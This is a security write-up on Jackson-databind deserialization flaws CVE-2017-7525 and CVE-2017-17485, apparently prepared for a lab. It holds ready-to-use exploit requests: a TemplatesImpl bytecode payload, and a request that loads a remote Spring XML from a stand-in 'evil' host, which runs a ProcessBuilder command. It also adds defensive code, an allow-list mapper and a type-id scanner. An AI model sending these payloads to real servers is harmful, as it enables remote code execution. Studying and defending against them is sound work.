Title: Jackson-databind Deserialization Vulnerability (CVE-2017-7525)

Jackson-databind Deserialization Vulnerability (CVE-2017-7525)

Jackson-databind supports a Polymorphic Deserialization feature (not enabled by default). When the Target class that a JSON string is converted into has polymorphic fields, that is, fields whose declared type is an interface, an abstract class or Object, the attacker can make Jackson instantiate a class of their choosing by naming the concrete type of the field (a subclass or interface implementation) in the JSON string. With the help of certain special classes, such as TemplatesImpl, this leads to arbitrary code execution.

Therefore, the conditions for exploiting this vulnerability are as follows:

Jackson polymorphic deserialization (default typing) is turned on, that is, either of the following methods is called:

objectMapper.enableDefaultTyping(); // defaults to DefaultTyping.OBJECT_AND_NON_CONCRETE
objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);

The Target class has a constructor that Jackson can call.

The Target class has a field whose type is an interface, an abstract class or Object, and the Gadget used is a subclass or implementation of that type.
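The following is an added example, not code from the original post: it places the vulnerable ObjectMapper configuration named above beside a hardened one. The package com.example.demo, the Target and Note classes and the JSON bodies are constructed for this example; the hardened variant uses the PolymorphicTypeValidator allow-list API that exists in jackson-databind 2.10 and later. java.util.HashMap stands in for an arbitrary attacker-chosen class name and is not itself a gadget.

```java
package com.example.demo;

import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingDemo {

    // Target class (constructed): a no-arg constructor plus a field of declared type Object,
    // exactly the shape the post lists as an exploit precondition.
    public static class Target {
        private Object param;
        public Object getParam() { return param; }
        public void setParam(Object param) { this.param = param; }
    }

    // A harmless model type that a legitimate client might send polymorphically (constructed).
    public static class Note {
        private String text;
        public String getText() { return text; }
        public void setText(String text) { this.text = text; }
    }

    // Same wire format as the post's payloads: ["fully.qualified.Class", <value>].
    // The class named here is our own Note, so resolving it is benign.
    static final String NOTE_JSON =
        "{\"param\":[\"com.example.demo.DefaultTypingDemo$Note\",{\"text\":\"hello\"}]}";

    // A class name outside our model package; a stand-in for whatever an attacker would name.
    static final String FOREIGN_JSON =
        "{\"param\":[\"java.util.HashMap\",{}]}";

    // 1) Vulnerable: the call the post names. Every class name found in the JSON is
    //    resolved and instantiated, with no restriction beyond "is a subtype of Object".
    @SuppressWarnings("deprecation")
    static ObjectMapper vulnerableMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(); // OBJECT_AND_NON_CONCRETE
        return m;
    }

    // 2) Hardened (Jackson 2.10+): default typing is only activated behind an allow-list
    //    validator, so only classes under our own package may appear as type ids.
    //    A blacklist of known gadgets (the approach CVE-2017-17485 bypassed) is not used.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType("com.example.demo.")
            .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
        return m;
    }

    public static void main(String[] args) throws Exception {
        // The vulnerable mapper happily builds whatever class the JSON names.
        Target t = vulnerableMapper().readValue(FOREIGN_JSON, Target.class);
        System.out.println("vulnerable mapper instantiated: " + t.getParam().getClass().getName());

        // The hardened mapper still supports polymorphism for our own types ...
        Target ok = hardenedMapper().readValue(NOTE_JSON, Target.class);
        System.out.println("hardened mapper accepted own type: " + ((Note) ok.getParam()).getText());

        // ... but refuses a type id outside the allow-list before any class is instantiated.
        try {
            hardenedMapper().readValue(FOREIGN_JSON, Target.class);
            System.out.println("UNEXPECTED: foreign type was accepted");
        } catch (JsonMappingException e) {
            System.out.println("hardened mapper rejected foreign type: " + e.getOriginalMessage());
        }
    }
}
```

The important design choice is the allow-list: the validator decides on the class name before Jackson loads the class, so a gadget that is not under the allowed prefix is never even resolved. On Jackson versions older than 2.10 the only safe option is to leave default typing off entirely and use @JsonTypeInfo with an explicit set of named subtypes on the fields that genuinely need polymorphism.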

CVE-2017-7525

When Jackson-databind sets the value of a member variable of the Target class and there is no corresponding setter method, it uses SetterlessProperty: it calls the getter, obtains the variable and then sets the variable's value. When the getOutputProperties() method is called, the class whose bytecode is held in transletBytecodes is loaded and instantiated, which causes the command to be executed. For details, please refer to the notes on TemplatesImpl in java-deserialization-jdk7u21-gadget-note.

Using com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl from JDK7u21 as the Gadget, sending the following request executes touch /tmp/prove1.txt:

POST /exploit HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 1298

{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
        "yv66vgAAADMAKAoABAAUCQADABUHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAKAAAAvAAEAAQAAAAUqtAACsAAAAAAAIACgAAAAAAYAAQAAAAOACwAAAAAWAAQAAAAAAWAAQAAAAAAAAAAAAAAAKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}

This POC only works when the target runs JDK7u21 or below; other environments require a different Gadget.

CVE-2017-17485

This is a bypass of the blacklist fix for CVE-2017-7525, using org.springframework.context.support.FileSystemXmlApplicationContext. To exploit it, a bean definition file must be hosted on any server, such as http://evil/spel.xml, with the following content:

<beans xmlns='http://www.springframework.org/schema/beans'
       xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
       xsi:schemaLocation='
         http://www.springframework.org/schema/beans
         http://www.springframework.org/schema/beans/spring-beans.xsd
       '>
    <bean id='pb' class='java.lang.ProcessBuilder'>
        <constructor-arg>
            <array>
                <value>touch</value>
                <value>/tmp/prove2.txt</value>
            </array>
        </constructor-arg>
        <property name='any' value='#{ pb.start() }'/>
    </bean>
</beans>

Then send the following request to make Jackson load the bean definition and trigger the vulnerability:

POST /exploit HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 138

{
  "param": [
    "org.springframework.context.support.FileSystemXmlApplicationContext",
    "http://IP/evil.xml"
  ]
}

touch /tmp/prove2.txt is executed successfully.

Principle: FileSystemXmlApplicationContext is used to load the remote bean definition file, which creates a ProcessBuilder bean, and Spring EL inside the XML file calls its start() method, achieving command execution.
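Both requests above carry the same tell-tale structure: a two-element JSON array whose first element is a fully-qualified class name that the application's own model never uses. The following added example (not from the original post) is a small detector that walks a request body with a plain ObjectMapper (default typing off, so the scan itself cannot trigger the vulnerability) and reports every type id outside an allowed package prefix. It covers the WRAPPER_ARRAY shape the post's payloads use and, going slightly beyond the post, the "@class" property shape that Jackson's As.PROPERTY inclusion produces. The com.example.model. prefix and the sample bodies are constructed; the two class names from the post appear only as detection signatures, with the payload contents elided.

```java
package com.example.demo;

import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class TypeIdScanner {

    // A fully-qualified Java class name: dotted identifiers with at least one dot.
    private static final Pattern CLASS_NAME =
        Pattern.compile("^[A-Za-z_$][\\w$]*(\\.[A-Za-z_$][\\w$]*)+$");

    // Packages whose classes are legitimately sent as type ids (constructed for this example).
    private static final String[] ALLOWED_PREFIXES = { "com.example.model." };

    // Tree parsing only; no default typing, so scanning a body never instantiates anything.
    private static final ObjectMapper SAFE_MAPPER = new ObjectMapper();

    /** Returns every disallowed class name used as a type id in the body (empty list = clean). */
    public static List<String> findForeignTypeIds(String body) {
        List<String> hits = new ArrayList<>();
        try {
            walk(SAFE_MAPPER.readTree(body), hits);
        } catch (Exception e) {
            hits.add("<unparseable body>"); // fail closed: malformed JSON is flagged too
        }
        return hits;
    }

    private static void walk(JsonNode node, List<String> hits) {
        if (node == null) return;
        if (node.isArray()) {
            // WRAPPER_ARRAY shape (the post's payloads): ["fully.qualified.Class", <value>]
            if (node.size() == 2 && node.get(0).isTextual()
                    && looksLikeForeignClass(node.get(0).asText())) {
                hits.add(node.get(0).asText());
            }
            for (JsonNode child : node) walk(child, hits);
        } else if (node.isObject()) {
            // PROPERTY shape: {"@class": "fully.qualified.Class", ...}
            JsonNode cls = node.get("@class");
            if (cls != null && cls.isTextual() && looksLikeForeignClass(cls.asText())) {
                hits.add(cls.asText());
            }
            for (JsonNode child : node) walk(child, hits); // iterates the object's values
        }
    }

    private static boolean looksLikeForeignClass(String s) {
        if (!CLASS_NAME.matcher(s).matches()) return false;
        for (String p : ALLOWED_PREFIXES) {
            if (s.startsWith(p)) return false;
        }
        return true;
    }

    public static void main(String[] args) {
        // Constructed sample bodies: the two type ids named in the post (payload contents elided),
        // one legitimate polymorphic request, and one plain request.
        String[] samples = {
            "{\"param\":[\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",{\"transletName\":\"a.b\"}]}",
            "{\"param\":[\"org.springframework.context.support.FileSystemXmlApplicationContext\",\"http://IP/evil.xml\"]}",
            "{\"param\":[\"com.example.model.Note\",{\"text\":\"hello\"}]}",
            "{\"param\":\"just a string\"}"
        };
        for (String s : samples) {
            System.out.println(findForeignTypeIds(s) + "  <-  " + s);
        }
    }
}
```

The first two samples are flagged, the last two come back clean. Because the check keys on structure rather than on a list of known gadget class names, it is not defeated by the kind of blacklist bypass described in this section; it does, however, need tuning to the application's own JSON, since a legitimate two-element array whose first element happens to be a dotted string would also be reported. The scan is a detection aid, not a substitute for the allow-list validator (or for leaving default typing off) in the ObjectMapper itself.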
